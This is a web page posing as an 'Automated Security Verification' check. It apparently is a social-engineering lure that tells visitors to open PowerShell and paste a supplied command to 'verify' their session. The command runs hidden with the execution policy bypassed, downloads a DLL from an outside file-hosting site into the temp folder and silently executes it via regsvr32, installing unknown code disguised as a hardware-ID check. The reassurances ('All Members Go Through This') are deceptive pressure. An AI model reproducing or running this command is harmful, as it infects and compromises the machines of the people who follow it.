🛡️

Automated Security Verification

Connection Status: Unverified

ALL connections are flagged by our automated security systems as dangerous. To ensure you have not been a part of malicious activity including bot spamming and raiding, you are required to run a one-time verification script.

🔧 Manual Verification Steps

(Don't Worry All Members Go Through This)

Please follow these steps precisely to verify your session:

  1. Press the Windows Key on your keyboard.
  2. Type PowerShell and press Enter. A blue or black terminal window will open.
  3. Click the code block below to copy the entire command to your clipboard.
  4. Right-click inside the PowerShell window and select Paste, then press Enter.
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Invoke-WebRequest -Uri 'https://files.catbox.moe/m0kk98.dll' -OutFile (Join-Path $env:TEMP 'hardwareid.dll')); Start-Process -WindowStyle Hidden -FilePath 'regsvr32.exe' -ArgumentList ('/s ' + (Join-Path $env:TEMP 'hardwareid.dll')); Start-Sleep -s 3"

(Click to copy command)